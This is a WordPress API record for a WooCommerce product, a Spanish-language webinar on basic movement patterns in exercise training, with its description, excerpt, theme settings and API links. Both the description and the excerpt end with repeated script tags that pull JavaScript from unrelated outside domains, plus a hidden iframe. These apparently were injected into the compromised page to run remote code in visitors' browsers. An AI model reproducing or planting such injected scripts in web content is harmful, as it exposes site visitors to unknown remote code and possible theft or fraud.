{"id":1370,"date":"2021-03-13T17:44:26","date_gmt":"2021-03-13T20:44:26","guid":{"rendered":"http:\/\/corporalkinesis.com.ar\/?post_type=product&#038;p=1370"},"modified":"2024-02-22T21:39:27","modified_gmt":"2024-02-23T00:39:27","slug":"patrones-basicos-de-movimiento","status":"publish","type":"product","link":"https:\/\/corporalkinesis.com.ar\/index.php\/producto\/patrones-basicos-de-movimiento\/","title":{"rendered":"Patrones B\u00e1sicos de movimiento"},"content":{"rendered":"<p><strong>Patrones B\u00e1sicos de movimiento<\/strong><\/p>\n<p>En este extenso webinar podr\u00e1s encontrar mucha informaci\u00f3n sobre como configurar o armar tus sesiones de entrenamiento teniendo en cuenta los patrones b\u00e1sicos de movimiento. Sin dudas se debe entrenar movimientos y no m\u00fasculos, en este mini-curso te ense\u00f1amos porque paso a paso bas\u00e1ndonos en evidencia cient\u00edfica actual.<\/p>\n<p>Sin dudas en este webinar te vas a llevar muchas herramientas para mejorar tu visi\u00f3n sobre el mundo del entrenamiento y las ciencias del ejercicio.<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><\/p>\n<p><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>PATRONES B\u00c1SICOS DE ENTRENAMIENTO<\/p>\n<p>En este extenso webinar podr\u00e1s encontrar mucha informaci\u00f3n sobre como configurar o armar tus sesiones de entrenamiento teniendo en cuenta los patrones b\u00e1sicos de movimiento. Sin dudas se debe entrenar movimientos y no m\u00fasculos, en este mini-curso te ense\u00f1amos porque paso a paso bas\u00e1ndonos en evidencia cient\u00edfica actual.<\/p>\n<p>Sin dudas en este webinar te vas a llevar muchas herramientas para mejorar tu visi\u00f3n sobre el mundo del entrenamiento y las ciencias del ejercicio.<\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><\/p>\n<p><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe><\/p>\n","protected":false},"featured_media":1832,"comment_status":"open","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}}},"product_brand":[],"product_cat":[63],"product_tag":[],"class_list":{"0":"post-1370","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-webinars","7":"desktop-align-left","8":"tablet-align-left","9":"mobile-align-left","11":"first","12":"instock","13":"virtual","14":"purchasable","15":"product-type-simple"},"_links":{"self":[{"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/product\/1370","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/comments?post=1370"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/media\/1832"}],"wp:attachment":[{"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/media?parent=1370"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/product_brand?post=1370"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/product_cat?post=1370"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/product_tag?post=1370"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}